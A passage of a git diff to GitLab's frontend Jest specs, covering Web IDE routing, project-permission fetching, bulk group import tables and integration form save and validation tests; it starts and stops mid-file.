${`/project/${PROJECT_NAMESPACE}/${PROJECT_NAME}/blob/blob/-/src/blob`} | ${'blob'} | ${'src/blob'} + ${`/project/${PROJECT_NAMESPACE}/${PROJECT_NAME}/edit/blob/-/src/blob`} | ${'blob'} | ${'src/blob'} + ${`/project/${PROJECT_NAMESPACE}/${PROJECT_NAME}/tree/blob`} | ${'blob'} | ${''} + ${`/project/${PROJECT_NAMESPACE}/${PROJECT_NAME}/edit`} | ${DEFAULT_BRANCH} | ${''} + ${`/project/${PROJECT_NAMESPACE}/${PROJECT_NAME}`} | ${DEFAULT_BRANCH} | ${''} + `('correctly opens Web IDE for $route', ({ route, expectedBranchId, expectedBasePath } = {}) => { + router.push(route); + + expect(store.dispatch).toHaveBeenCalledWith('openBranch', { + projectId: `${PROJECT_NAMESPACE}/${PROJECT_NAME}`, + branchId: expectedBranchId, + basePath: expectedBasePath, + }); + }); + + it('correctly opens an MR', () => { + const expectedId = '2'; + + router.push(`/project/${PROJECT_NAMESPACE}/${PROJECT_NAME}/merge_requests/${expectedId}`); + + expect(store.dispatch).toHaveBeenCalledWith('openMergeRequest', { + projectId: `${PROJECT_NAMESPACE}/${PROJECT_NAME}`, + mergeRequestId: expectedId, + targetProjectId: undefined, }); + expect(store.dispatch).not.toHaveBeenCalledWith('openBranch'); }); it('keeps router in sync when store changes', async () => { diff --git a/spec/frontend/ide/services/index_spec.js b/spec/frontend/ide/services/index_spec.js index eacf1244d55..0fab828dfb3 100644 --- a/spec/frontend/ide/services/index_spec.js +++ b/spec/frontend/ide/services/index_spec.js @@ -6,7 +6,7 @@ import dismissUserCallout from '~/graphql_shared/mutations/dismiss_user_callout. import services from '~/ide/services'; import { query, mutate } from '~/ide/services/gql'; import { escapeFileUrl } from '~/lib/utils/url_utility'; -import ciConfig from '~/pipeline_editor/graphql/queries/ci_config.graphql'; +import ciConfig from '~/pipeline_editor/graphql/queries/ci_config.query.graphql'; import { projectData } from '../mock_data'; jest.mock('~/api'); @@ -216,29 +216,6 @@ describe('IDE services', () => { ); }); - describe('getProjectData', () => { - it('combines gql and API requests', () => { - const gqlProjectData = { - userPermissions: { - bogus: true, - }, - }; - Api.project.mockReturnValue(Promise.resolve({ data: { ...projectData } })); - query.mockReturnValue(Promise.resolve({ data: { project: gqlProjectData } })); - - return services.getProjectData(TEST_NAMESPACE, TEST_PROJECT).then((response) => { - expect(response).toEqual({ data: { ...projectData, ...gqlProjectData } }); - expect(Api.project).toHaveBeenCalledWith(TEST_PROJECT_ID); - expect(query).toHaveBeenCalledWith({ - query: getIdeProject, - variables: { - projectPath: TEST_PROJECT_ID, - }, - }); - }); - }); - }); - describe('getFiles', () => { let mock; let relativeUrlRoot; @@ -330,4 +307,38 @@ describe('IDE services', () => { }); }); }); + + describe('getProjectPermissionsData', () => { + const TEST_PROJECT_PATH = 'foo/bar'; + + it('queries for the project permissions', () => { + const result = { data: { project: projectData } }; + query.mockResolvedValue(result); + + return services.getProjectPermissionsData(TEST_PROJECT_PATH).then((data) => { + expect(data).toEqual(result.data.project); + expect(query).toHaveBeenCalledWith( + expect.objectContaining({ + query: getIdeProject, + variables: { projectPath: TEST_PROJECT_PATH }, + }), + ); + }); + }); + + it('converts the returned GraphQL id to the regular ID number', () => { + const projectId = 2; + const gqlProjectData = { + id: `gid://gitlab/Project/${projectId}`, + userPermissions: { + bogus: true, + }, + }; + + query.mockResolvedValue({ data: { project: gqlProjectData } }); + return services.getProjectPermissionsData(TEST_PROJECT_PATH).then((data) => { + expect(data.id).toBe(projectId); + }); + }); + }); }); diff --git a/spec/frontend/ide/stores/actions/project_spec.js b/spec/frontend/ide/stores/actions/project_spec.js index ca6f7169059..e07dcf22860 100644 --- a/spec/frontend/ide/stores/actions/project_spec.js +++ b/spec/frontend/ide/stores/actions/project_spec.js @@ -2,9 +2,12 @@ import MockAdapter from 'axios-mock-adapter'; import { useMockLocationHelper } from 'helpers/mock_window_location_helper'; import testAction from 'helpers/vuex_action_helper'; import api from '~/api'; +import createFlash from '~/flash'; import service from '~/ide/services'; import { createStore } from '~/ide/stores'; import { + setProject, + fetchProjectPermissions, refreshLastCommitData, showBranchNotFoundError, createNewBranchFromDefault, @@ -13,8 +16,12 @@ import { loadFile, loadBranch, } from '~/ide/stores/actions'; +import { logError } from '~/lib/logger'; import axios from '~/lib/utils/axios_utils'; +jest.mock('~/flash'); +jest.mock('~/lib/logger'); + const TEST_PROJECT_ID = 'abc/def'; describe('IDE store project actions', () => { @@ -34,6 +41,92 @@ describe('IDE store project actions', () => { mock.restore(); }); + describe('setProject', () => { + const project = { id: 'foo', path_with_namespace: TEST_PROJECT_ID }; + const baseMutations = [ + { + type: 'SET_PROJECT', + payload: { + projectPath: TEST_PROJECT_ID, + project, + }, + }, + { + type: 'SET_CURRENT_PROJECT', + payload: TEST_PROJECT_ID, + }, + ]; + + it.each` + desc | payload | expectedMutations + ${'does not commit any action if project is not passed'} | ${undefined} | ${[]} + ${'commits correct actions in the correct order by default'} | ${{ project }} | ${[...baseMutations]} + `('$desc', async ({ payload, expectedMutations } = {}) => { + await testAction({ + action: setProject, + payload, + state: store.state, + expectedMutations, + expectedActions: [], + }); + }); + }); + + describe('fetchProjectPermissions', () => { + const permissionsData = { + userPermissions: { + bogus: true, + }, + }; + const permissionsMutations = [ + { + type: 'UPDATE_PROJECT', + payload: { + projectPath: TEST_PROJECT_ID, + props: { + ...permissionsData, + }, + }, + }, + ]; + + let spy; + + beforeEach(() => { + spy = jest.spyOn(service, 'getProjectPermissionsData'); + }); + + afterEach(() => { + createFlash.mockRestore(); + }); + + it.each` + desc | projectPath | responseSuccess | expectedMutations + ${'does not fetch permissions if project does not exist'} | ${undefined} | ${true} | ${[]} + ${'fetches permission when project is specified'} | ${TEST_PROJECT_ID} | ${true} | ${[...permissionsMutations]} + ${'flashes an error if the request fails'} | ${TEST_PROJECT_ID} | ${false} | ${[]} + `('$desc', async ({ projectPath, expectedMutations, responseSuccess } = {}) => { + store.state.currentProjectId = projectPath; + if (responseSuccess) { + spy.mockResolvedValue(permissionsData); + } else { + spy.mockRejectedValue(); + } + + await testAction({ + action: fetchProjectPermissions, + state: store.state, + expectedMutations, + expectedActions: [], + }); + + if (!responseSuccess) { + expect(logError).toHaveBeenCalled(); + expect(createFlash).toHaveBeenCalled(); + } + }); + }); + describe('refreshLastCommitData', () => { beforeEach(() => { store.state.currentProjectId = 'abc/def'; diff --git a/spec/frontend/ide/stores/mutations/project_spec.js b/spec/frontend/ide/stores/mutations/project_spec.js index b3ce39c33d2..0fdd7798f00 100644 --- a/spec/frontend/ide/stores/mutations/project_spec.js +++ b/spec/frontend/ide/stores/mutations/project_spec.js @@ -3,21 +3,48 @@ import state from '~/ide/stores/state'; describe('Multi-file store branch mutations', () => { let localState; + const nonExistentProj = 'nonexistent'; + const existingProj = 'abcproject'; beforeEach(() => { localState = state(); - localState.projects = { abcproject: { empty_repo: true } }; + localState.projects = { [existingProj]: { empty_repo: true } }; }); describe('TOGGLE_EMPTY_STATE', () => { it('sets empty_repo for project to passed value', () => { - mutations.TOGGLE_EMPTY_STATE(localState, { projectPath: 'abcproject', value: false }); + mutations.TOGGLE_EMPTY_STATE(localState, { projectPath: existingProj, value: false }); - expect(localState.projects.abcproject.empty_repo).toBe(false); + expect(localState.projects[existingProj].empty_repo).toBe(false); - mutations.TOGGLE_EMPTY_STATE(localState, { projectPath: 'abcproject', value: true }); + mutations.TOGGLE_EMPTY_STATE(localState, { projectPath: existingProj, value: true }); - expect(localState.projects.abcproject.empty_repo).toBe(true); + expect(localState.projects[existingProj].empty_repo).toBe(true); + }); + }); + + describe('UPDATE_PROJECT', () => { + it.each` + desc | projectPath | props | expectedProps + ${'extends existing project with the passed props'} | ${existingProj} | ${{ foo1: 'bar' }} | ${{ foo1: 'bar' }} + ${'overrides existing props on the exsiting project'} | ${existingProj} | ${{ empty_repo: false }} | ${{ empty_repo: false }} + ${'does nothing if the project does not exist'} | ${nonExistentProj} | ${{ foo2: 'bar' }} | ${undefined} + ${'does nothing if project is not passed'} | ${undefined} | ${{ foo3: 'bar' }} | ${undefined} + ${'does nothing if the props are not passed'} | ${existingProj} | ${undefined} | ${{}} + ${'does nothing if the props are empty'} | ${existingProj} | ${{}} | ${{}} + `('$desc', ({ projectPath, props, expectedProps } = {}) => { + const origProject = localState.projects[projectPath]; + + mutations.UPDATE_PROJECT(localState, { projectPath, props }); + + if (!expectedProps) { + expect(localState.projects[projectPath]).toBeUndefined(); + } else { + expect(localState.projects[projectPath]).toEqual({ + ...origProject, + ...expectedProps, + }); + } }); }); }); diff --git a/spec/frontend/import_entities/import_groups/components/import_table_spec.js b/spec/frontend/import_entities/import_groups/components/import_table_spec.js index 6e3df21e30a..b17ff2e0f52 100644 --- a/spec/frontend/import_entities/import_groups/components/import_table_spec.js +++ b/spec/frontend/import_entities/import_groups/components/import_table_spec.js @@ -1,4 +1,4 @@ -import { GlEmptyState, GlLoadingIcon } from '@gitlab/ui'; +import { GlAlert, GlEmptyState, GlLoadingIcon } from '@gitlab/ui'; import { mount } from '@vue/test-utils'; import Vue, { nextTick } from 'vue'; import VueApollo from 'vue-apollo'; @@ -33,13 +33,23 @@ describe('import table', () => { generateFakeEntry({ id: 2, status: STATUSES.FINISHED }), ]; const FAKE_PAGE_INFO = { page: 1, perPage: 20, total: 40, totalPages: 2 }; + const FAKE_VERSION_VALIDATION = { + features: { + projectMigration: { available: false, minVersion: '14.8.0' }, + sourceInstanceVersion: '14.6.0', + }, + }; const findImportSelectedButton = () => wrapper.findAll('button').wrappers.find((w) => w.text() === 'Import selected'); const findImportButtons = () => wrapper.findAll('button').wrappers.filter((w) => w.text() === 'Import'); - const findPaginationDropdown = () => wrapper.find('[aria-label="Page size"]'); + const findPaginationDropdown = () => wrapper.find('[data-testid="page-size"]'); const findPaginationDropdownText = () => findPaginationDropdown().find('button').text(); + const findSelectionCount = () => wrapper.find('[data-test-id="selection-count"]'); + + const triggerSelectAllCheckbox = () => + wrapper.find('thead input[type=checkbox]').trigger('click'); const selectRow = (idx) => wrapper.findAll('tbody td input[type=checkbox]').at(idx).trigger('click'); @@ -104,6 +114,7 @@ describe('import table', () => { bulkImportSourceGroups: () => ({ nodes: [], pageInfo: FAKE_PAGE_INFO, + versionValidation: FAKE_VERSION_VALIDATION, }), }); await waitForPromises(); @@ -117,6 +128,7 @@ describe('import table', () => { bulkImportSourceGroups: () => ({ nodes: FAKE_GROUPS, pageInfo: FAKE_PAGE_INFO, + versionValidation: FAKE_VERSION_VALIDATION, }), }); await waitForPromises(); @@ -129,6 +141,7 @@ describe('import table', () => { bulkImportSourceGroups: jest.fn().mockResolvedValue({ nodes: [], pageInfo: FAKE_PAGE_INFO, + versionValidation: FAKE_VERSION_VALIDATION, }), }); await waitForPromises(); @@ -138,7 +151,11 @@ describe('import table', () => { it('invokes importGroups mutation when row button is clicked', async () => { createComponent({ - bulkImportSourceGroups: () => ({ nodes: [FAKE_GROUP], pageInfo: FAKE_PAGE_INFO }), + bulkImportSourceGroups: () => ({ + nodes: [FAKE_GROUP], + pageInfo: FAKE_PAGE_INFO, + versionValidation: FAKE_VERSION_VALIDATION, + }), }); jest.spyOn(apolloProvider.defaultClient, 'mutate'); @@ -162,7 +179,11 @@ describe('import table', () => { it('displays error if importing group fails', async () => { createComponent({ - bulkImportSourceGroups: () => ({ nodes: [FAKE_GROUP], pageInfo: FAKE_PAGE_INFO }), + bulkImportSourceGroups: () => ({ + nodes: [FAKE_GROUP], + pageInfo: FAKE_PAGE_INFO, + versionValidation: FAKE_VERSION_VALIDATION, + }), importGroups: () => { throw new Error(); }, @@ -182,9 +203,11 @@ describe('import table', () => { }); describe('pagination', () => { - const bulkImportSourceGroupsQueryMock = jest - .fn() - .mockResolvedValue({ nodes: [FAKE_GROUP], pageInfo: FAKE_PAGE_INFO }); + const bulkImportSourceGroupsQueryMock = jest.fn().mockResolvedValue({ + nodes: [FAKE_GROUP], + pageInfo: FAKE_PAGE_INFO, + versionValidation: FAKE_VERSION_VALIDATION, + }); beforeEach(() => { createComponent({ @@ -205,7 +228,13 @@ describe('import table', () => { const otherOption = findPaginationDropdown().findAll('li p').at(1); expect(otherOption.text()).toMatchInterpolatedText('50 items per page'); + bulkImportSourceGroupsQueryMock.mockResolvedValue({ + nodes: [FAKE_GROUP], + pageInfo: { ...FAKE_PAGE_INFO, perPage: 50 }, + versionValidation: FAKE_VERSION_VALIDATION, + }); await otherOption.trigger('click'); + await waitForPromises(); expect(findPaginationDropdownText()).toMatchInterpolatedText('50 items per page'); @@ -234,6 +263,7 @@ describe('import table', () => { perPage: 20, totalPages: 2, }, + versionValidation: FAKE_VERSION_VALIDATION, }); wrapper.find(PaginationLinks).props().change(REQUESTED_PAGE); await waitForPromises(); @@ -243,9 +273,11 @@ describe('import table', () => { }); describe('filters', () => { - const bulkImportSourceGroupsQueryMock = jest - .fn() - .mockResolvedValue({ nodes: [FAKE_GROUP], pageInfo: FAKE_PAGE_INFO }); + const bulkImportSourceGroupsQueryMock = jest.fn().mockResolvedValue({ + nodes: [FAKE_GROUP], + pageInfo: FAKE_PAGE_INFO, + versionValidation: FAKE_VERSION_VALIDATION, + }); beforeEach(() => { createComponent({ @@ -313,11 +345,28 @@ describe('import table', () => { }); describe('bulk operations', () => { + it('import all button correctly selects/deselects all groups', async () => { + createComponent({ + bulkImportSourceGroups: () => ({ + nodes: FAKE_GROUPS, + pageInfo: FAKE_PAGE_INFO, + versionValidation: FAKE_VERSION_VALIDATION, + }), + }); + await waitForPromises(); + expect(findSelectionCount().text()).toMatchInterpolatedText('0 selected'); + await triggerSelectAllCheckbox(); + expect(findSelectionCount().text()).toMatchInterpolatedText('2 selected'); + await triggerSelectAllCheckbox(); + expect(findSelectionCount().text()).toMatchInterpolatedText('0 selected'); + }); + it('import selected button is disabled when no groups selected', async () => { createComponent({ bulkImportSourceGroups: () => ({ nodes: FAKE_GROUPS, pageInfo: FAKE_PAGE_INFO, + versionValidation: FAKE_VERSION_VALIDATION, }), }); await waitForPromises(); @@ -330,6 +379,7 @@ describe('import table', () => { bulkImportSourceGroups: () => ({ nodes: FAKE_GROUPS, pageInfo: FAKE_PAGE_INFO, + versionValidation: FAKE_VERSION_VALIDATION, }), }); await waitForPromises(); @@ -346,6 +396,7 @@ describe('import table', () => { bulkImportSourceGroups: () => ({ nodes: NEW_GROUPS, pageInfo: FAKE_PAGE_INFO, + versionValidation: FAKE_VERSION_VALIDATION, }), }); await waitForPromises(); @@ -368,6 +419,7 @@ describe('import table', () => { bulkImportSourceGroups: () => ({ nodes: NEW_GROUPS, pageInfo: FAKE_PAGE_INFO, + versionValidation: FAKE_VERSION_VALIDATION, }), }); await waitForPromises(); @@ -391,6 +443,7 @@ describe('import table', () => { bulkImportSourceGroups: () => ({ nodes: NEW_GROUPS, pageInfo: FAKE_PAGE_INFO, + versionValidation: FAKE_VERSION_VALIDATION, }), }); jest.spyOn(apolloProvider.defaultClient, 'mutate'); @@ -421,4 +474,38 @@ describe('import table', () => { }); }); }); + + describe('unavailable features warning', () => { + it('renders alert when there are unavailable features', async () => { + createComponent({ + bulkImportSourceGroups: () => ({ + nodes: FAKE_GROUPS, + pageInfo: FAKE_PAGE_INFO, + versionValidation: FAKE_VERSION_VALIDATION, + }), + }); + await waitForPromises(); + + expect(wrapper.find(GlAlert).exists()).toBe(true); + expect(wrapper.find(GlAlert).text()).toContain('projects (require v14.8.0)'); + }); + + it('does not renders alert when there are no unavailable features', async () => { + createComponent({ + bulkImportSourceGroups: () => ({ + nodes: FAKE_GROUPS, + pageInfo: FAKE_PAGE_INFO, + versionValidation: { + features: { + projectMigration: { available: true, minVersion: '14.8.0' }, + sourceInstanceVersion: '14.6.0', + }, + }, + }), + }); + await waitForPromises(); + + expect(wrapper.find(GlAlert).exists()).toBe(false); + }); + }); }); diff --git a/spec/frontend/import_entities/import_groups/components/import_target_cell_spec.js b/spec/frontend/import_entities/import_groups/components/import_target_cell_spec.js index 3c2367e22f5..d3f86672f33 100644 --- a/spec/frontend/import_entities/import_groups/components/import_target_cell_spec.js +++ b/spec/frontend/import_entities/import_groups/components/import_target_cell_spec.js @@ -123,13 +123,22 @@ describe('import target cell', () => { }); describe('when entity is available for import', () => { + const FAKE_PROGRESS_MESSAGE = 'progress message'; beforeEach(() => { - group = generateFakeTableEntry({ id: 1, flags: { isAvailableForImport: true } }); + group = generateFakeTableEntry({ + id: 1, + flags: { isAvailableForImport: true }, + progress: { message: FAKE_PROGRESS_MESSAGE }, + }); createComponent({ group }); }); it('renders namespace dropdown as enabled', () => { expect(findNamespaceDropdown().attributes('disabled')).toBe(undefined); }); + + it('renders progress message as error if it exists', () => { + expect(wrapper.find('[role=alert]').text()).toBe(FAKE_PROGRESS_MESSAGE); + }); }); }); diff --git a/spec/frontend/import_entities/import_groups/graphql/client_factory_spec.js b/spec/frontend/import_entities/import_groups/graphql/client_factory_spec.js index f3447494578..c6ddce17fe4 100644 --- a/spec/frontend/import_entities/import_groups/graphql/client_factory_spec.js +++ b/spec/frontend/import_entities/import_groups/graphql/client_factory_spec.js @@ -163,12 +163,34 @@ describe('Bulk import resolvers', () => { }); describe('mutations', () => { - beforeEach(() => { - axiosMockAdapter.onPost(FAKE_ENDPOINTS.createBulkImport).reply(httpStatus.OK, { id: 1 }); - }); + beforeEach(() => {}); describe('importGroup', () => { - it('sets import status to CREATED when request completes', async () => { + it('sets import status to CREATED for successful groups when request completes', async () => { + axiosMockAdapter + .onPost(FAKE_ENDPOINTS.createBulkImport) + .reply(httpStatus.OK, [{ success: true, id: 1 }]); + + await client.mutate({ + mutation: importGroupsMutation, + variables: { + importRequests: [ + { + sourceGroupId: statusEndpointFixture.importable_data[0].id, + newName: 'test', + targetNamespace: 'root', + }, + ], + }, + }); + + await axios.waitForAll(); + expect(results[0].progress.status).toBe(STATUSES.CREATED); + }); + + it('sets import status to CREATED for successful groups when request completes with legacy response', async () => { + axiosMockAdapter.onPost(FAKE_ENDPOINTS.createBulkImport).reply(httpStatus.OK, { id: 1 }); + await client.mutate({ mutation: importGroupsMutation, variables: { @@ -185,9 +207,37 @@ describe('Bulk import resolvers', () => { await axios.waitForAll(); expect(results[0].progress.status).toBe(STATUSES.CREATED); }); + + it('sets import status to FAILED and sets progress message for failed groups when request completes', async () => { + const FAKE_ERROR_MESSAGE = 'foo'; + axiosMockAdapter + .onPost(FAKE_ENDPOINTS.createBulkImport) + .reply(httpStatus.OK, [{ success: false, id: 1, message: FAKE_ERROR_MESSAGE }]); + + await client.mutate({ + mutation: importGroupsMutation, + variables: { + importRequests: [ + { + sourceGroupId: statusEndpointFixture.importable_data[0].id, + newName: 'test', + targetNamespace: 'root', + }, + ], + }, + }); + + await axios.waitForAll(); + expect(results[0].progress.status).toBe(STATUSES.FAILED); + expect(results[0].progress.message).toBe(FAKE_ERROR_MESSAGE); + }); }); it('updateImportStatus updates status', async () => { + axiosMockAdapter + .onPost(FAKE_ENDPOINTS.createBulkImport) + .reply(httpStatus.OK, [{ success: true, id: 1 }]); + const NEW_STATUS = 'dummy'; await client.mutate({ mutation: importGroupsMutation, @@ -216,6 +266,7 @@ describe('Bulk import resolvers', () => { expect(statusInResponse).toStrictEqual({ __typename: clientTypenames.BulkImportProgress, id, + message: null, status: NEW_STATUS, }); }); diff --git a/spec/frontend/import_entities/import_groups/graphql/fixtures.js b/spec/frontend/import_entities/import_groups/graphql/fixtures.js index 5f6f9987a8f..ed4e343f331 100644 --- a/spec/frontend/import_entities/import_groups/graphql/fixtures.js +++ b/spec/frontend/import_entities/import_groups/graphql/fixtures.js @@ -1,7 +1,7 @@ import { STATUSES } from '~/import_entities/constants'; import { clientTypenames } from '~/import_entities/import_groups/graphql/client_factory'; -export const generateFakeEntry = ({ id, status, ...rest }) => ({ +export const generateFakeEntry = ({ id, status, message, ...rest }) => ({ __typename: clientTypenames.BulkImportSourceGroup, webUrl: `https://fake.host/${id}`, fullPath: `fake_group_${id}`, @@ -18,6 +18,7 @@ export const generateFakeEntry = ({ id, status, ...rest }) => ({ : { id, status, + message: message || '', }, ...rest, }); @@ -49,6 +50,12 @@ export const statusEndpointFixture = { web_url: 'https://gitlab.com/groups/gitlab-examples', }, ], + version_validation: { + features: { + project_migration: { available: false, min_version: '14.8.0' }, + source_instance_version: '14.6.0', + }, + }, }; export const availableNamespacesFixture = Object.freeze([ diff --git a/spec/frontend/incidents_settings/components/__snapshots__/pagerduty_form_spec.js.snap b/spec/frontend/incidents_settings/components/__snapshots__/pagerduty_form_spec.js.snap index 2a976c04319..feee14c9c40 100644 --- a/spec/frontend/incidents_settings/components/__snapshots__/pagerduty_form_spec.js.snap +++ b/spec/frontend/incidents_settings/components/__snapshots__/pagerduty_form_spec.js.snap @@ -14,6 +14,7 @@ exports[`Alert integration settings form should match the default snapshot 1`] = <gl-form-group-stub class="col-8 col-md-9 gl-p-0" labeldescription="" + optionaltext="(optional)" > <gl-toggle-stub id="active" @@ -28,10 +29,12 @@ exports[`Alert integration settings form should match the default snapshot 1`] = label="Webhook URL" label-for="url" labeldescription="" + optionaltext="(optional)" > <gl-form-input-group-stub data-testid="webhook-url" id="url" + inputclass="" predefinedoptions="[object Object]" readonly="" value="pagerduty.webhook.com" diff --git a/spec/frontend/integrations/edit/components/active_checkbox_spec.js b/spec/frontend/integrations/edit/components/active_checkbox_spec.js index df7ffd19747..0dc31616166 100644 --- a/spec/frontend/integrations/edit/components/active_checkbox_spec.js +++ b/spec/frontend/integrations/edit/components/active_checkbox_spec.js @@ -34,16 +34,22 @@ describe('ActiveCheckbox', () => { }); }); - describe('initialActivated is false', () => { - it('renders GlFormCheckbox as unchecked', () => { + describe('initialActivated is `false`', () => { + beforeEach(() => { createComponent({ initialActivated: false, }); + }); + it('renders GlFormCheckbox as unchecked', () => { expect(findGlFormCheckbox().exists()).toBe(true); expect(findGlFormCheckbox().vm.$attrs.checked).toBe(false); expect(findInputInCheckbox().attributes('disabled')).toBeUndefined(); }); + + it('emits `toggle-integration-active` event with `false` on mount', () => { + expect(wrapper.emitted('toggle-integration-active')[0]).toEqual([false]); + }); }); describe('initialActivated is true', () => { @@ -63,10 +69,21 @@ describe('ActiveCheckbox', () => { findInputInCheckbox().trigger('click'); await wrapper.vm.$nextTick(); - expect(findGlFormCheckbox().vm.$attrs.checked).toBe(false); }); }); + + it('emits `toggle-integration-active` event with `true` on mount', () => { + expect(wrapper.emitted('toggle-integration-active')[0]).toEqual([true]); + }); + + describe('on checkbox `change` event', () => { + it('emits `toggle-integration-active` event', () => { + findGlFormCheckbox().vm.$emit('change', false); + + expect(wrapper.emitted('toggle-integration-active')[1]).toEqual([false]); + }); + }); }); }); }); diff --git a/spec/frontend/integrations/edit/components/integration_form_spec.js b/spec/frontend/integrations/edit/components/integration_form_spec.js index 0a9cbadb249..4c1394f3a87 100644 --- a/spec/frontend/integrations/edit/components/integration_form_spec.js +++ b/spec/frontend/integrations/edit/components/integration_form_spec.js @@ -1,6 +1,8 @@ +import axios from 'axios'; +import MockAdapter from 'axios-mock-adapter'; +import * as Sentry from '@sentry/browser'; import { setHTMLFixture } from 'helpers/fixtures'; import { shallowMountExtended } from 'helpers/vue_test_utils_helper'; - import { mockIntegrationProps } from 'jest/integrations/edit/mock_data'; import ActiveCheckbox from '~/integrations/edit/components/active_checkbox.vue'; import ConfirmationModal from '~/integrations/edit/components/confirmation_modal.vue'; @@ -11,11 +13,27 @@ import JiraTriggerFields from '~/integrations/edit/components/jira_trigger_field import OverrideDropdown from '~/integrations/edit/components/override_dropdown.vue'; import ResetConfirmationModal from '~/integrations/edit/components/reset_confirmation_modal.vue'; import TriggerFields from '~/integrations/edit/components/trigger_fields.vue'; -import { integrationLevels } from '~/integrations/constants'; +import waitForPromises from 'helpers/wait_for_promises'; +import { + integrationLevels, + I18N_SUCCESSFUL_CONNECTION_MESSAGE, + VALIDATE_INTEGRATION_FORM_EVENT, + I18N_DEFAULT_ERROR_MESSAGE, +} from '~/integrations/constants'; import { createStore } from '~/integrations/edit/store'; +import eventHub from '~/integrations/edit/event_hub'; +import httpStatus from '~/lib/utils/http_status'; + +jest.mock('~/integrations/edit/event_hub'); +jest.mock('@sentry/browser'); describe('IntegrationForm', () => { + const mockToastShow = jest.fn(); + let wrapper; + let dispatch; + let mockAxios; + let mockForm; const createComponent = ({ customStateProps = {}, @@ -23,12 +41,18 @@ describe('IntegrationForm', () => { initialState = {}, props = {}, } = {}) => { + const store = createStore({ + customState: { ...mockIntegrationProps, ...customStateProps }, + ...initialState, + }); + dispatch = jest.spyOn(store, 'dispatch').mockImplementation(); + wrapper = shallowMountExtended(IntegrationForm, { - propsData: { ...props }, - store: createStore({ - customState: { ...mockIntegrationProps, ...customStateProps }, - ...initialState, - }), + propsData: { ...props, formSelector: '.test' }, + provide: { + glFeatures: featureFlags, + }, + store, stubs: { OverrideDropdown, ActiveCheckbox, @@ -36,46 +60,42 @@ describe('IntegrationForm', () => { JiraTriggerFields, TriggerFields, }, - provide: { - glFeatures: featureFlags, + mocks: { + $toast: { + show: mockToastShow, + }, }, }); }; - afterEach(() => { - wrapper.destroy(); - }); + const createForm = ({ isValid = true } = {}) => { + mockForm = document.createElement('form'); + jest.spyOn(document, 'querySelector').mockReturnValue(mockForm); + jest.spyOn(mockForm, 'checkValidity').mockReturnValue(isValid); + jest.spyOn(mockForm, 'submit'); + }; const findOverrideDropdown = () => wrapper.findComponent(OverrideDropdown); const findActiveCheckbox = () => wrapper.findComponent(ActiveCheckbox); const findConfirmationModal = () => wrapper.findComponent(ConfirmationModal); const findResetConfirmationModal = () => wrapper.findComponent(ResetConfirmationModal); const findResetButton = () => wrapper.findByTestId('reset-button'); + const findSaveButton = () => wrapper.findByTestId('save-button'); + const findTestButton = () => wrapper.findByTestId('test-button'); const findJiraTriggerFields = () => wrapper.findComponent(JiraTriggerFields); const findJiraIssuesFields = () => wrapper.findComponent(JiraIssuesFields); const findTriggerFields = () => wrapper.findComponent(TriggerFields); - describe('template', () => { - describe('showActive is true', () => { - it('renders ActiveCheckbox', () => { - createComponent(); - - expect(findActiveCheckbox().exists()).toBe(true); - }); - }); - - describe('showActive is false', () => { - it('does not render ActiveCheckbox', () => { - createComponent({ - customStateProps: { - showActive: false, - }, - }); + beforeEach(() => { + mockAxios = new MockAdapter(axios); + }); - expect(findActiveCheckbox().exists()).toBe(false); - }); - }); + afterEach(() => { + wrapper.destroy(); + mockAxios.restore(); + }); + describe('template', () => { describe('integrationLevel is instance', () => { it('renders ConfirmationModal', () => { createComponent({ @@ -195,13 +215,29 @@ describe('IntegrationForm', () => { }); describe('type is "jira"', () => { - it('renders JiraTriggerFields', () => { + beforeEach(() => { + jest.spyOn(document, 'querySelector').mockReturnValue(document.createElement('form')); + createComponent({ - customStateProps: { type: 'jira' }, + customStateProps: { type: 'jira', testPath: '/test' }, }); + }); + it('renders JiraTriggerFields', () => { expect(findJiraTriggerFields().exists()).toBe(true); }); + + it('renders JiraIssuesFields', () => { + expect(findJiraIssuesFields().exists()).toBe(true); + }); + + describe('when JiraIssueFields emits `request-jira-issue-types` event', () => { + it('dispatches `requestJiraIssueTypes` action', () => { + findJiraIssuesFields().vm.$emit('request-jira-issue-types'); + + expect(dispatch).toHaveBeenCalledWith('requestJiraIssueTypes', expect.any(FormData)); + }); + }); }); describe('triggerEvents is present', () => { @@ -303,4 +339,210 @@ describe('IntegrationForm', () => { }); }); }); + + describe('ActiveCheckbox', () => { + describe.each` + showActive + ${true} + ${false} + `('when `showActive` is $showActive', ({ showActive }) => { + it(`${showActive ? 'renders' : 'does not render'} ActiveCheckbox`, () => { + createComponent({ + customStateProps: { + showActive, + }, + }); + + expect(findActiveCheckbox().exists()).toBe(showActive); + }); + }); + + describe.each` + formActive | novalidate + ${true} | ${null} + ${false} | ${'true'} + `( + 'when `toggle-integration-active` is emitted with $formActive', + ({ formActive, novalidate }) => { + beforeEach(async () => { + createForm(); + createComponent({ + customStateProps: { + showActive: true, + initialActivated: false, + }, + }); + + await findActiveCheckbox().vm.$emit('toggle-integration-active', formActive); + }); + + it(`sets noValidate to ${novalidate}`, () => { + expect(mockForm.getAttribute('novalidate')).toBe(novalidate); + }); + }, + ); + }); + + describe('when `save` button is clicked', () => { + describe('buttons', () => { + beforeEach(async () => { + createForm(); + createComponent({ + customStateProps: { + showActive: true, + canTest: true, + initialActivated: true, + }, + }); + + await findSaveButton().vm.$emit('click', new Event('click')); + }); + + it('sets save button `loading` prop to `true`', () => { + expect(findSaveButton().props('loading')).toBe(true); + }); + + it('sets test button `disabled` prop to `true`', () => { + expect(findTestButton().props('disabled')).toBe(true); + }); + }); + + describe.each` + checkValidityReturn | integrationActive + ${true} | ${false} + ${true} | ${true} + ${false} | ${false} + `( + 'when form is valid (checkValidity returns $checkValidityReturn and integrationActive is $integrationActive)', + ({ integrationActive, checkValidityReturn }) => { + beforeEach(async () => { + createForm({ isValid: checkValidityReturn }); + createComponent({ + customStateProps: { + showActive: true, + canTest: true, + initialActivated: integrationActive, + }, + }); + + await findSaveButton().vm.$emit('click', new Event('click')); + }); + + it('submit form', () => { + expect(mockForm.submit).toHaveBeenCalledTimes(1); + }); + }, + ); + + describe('when form is invalid (checkValidity returns false and integrationActive is true)', () => { + beforeEach(async () => { + createForm({ isValid: false }); + createComponent({ + customStateProps: { + showActive: true, + canTest: true, + initialActivated: true, + }, + }); + + await findSaveButton().vm.$emit('click', new Event('click')); + }); + + it('does not submit form', () => { + expect(mockForm.submit).not.toHaveBeenCalled(); + }); + + it('sets save button `loading` prop to `false`', () => { + expect(findSaveButton().props('loading')).toBe(false); + }); + + it('sets test button `disabled` prop to `false`', () => { + 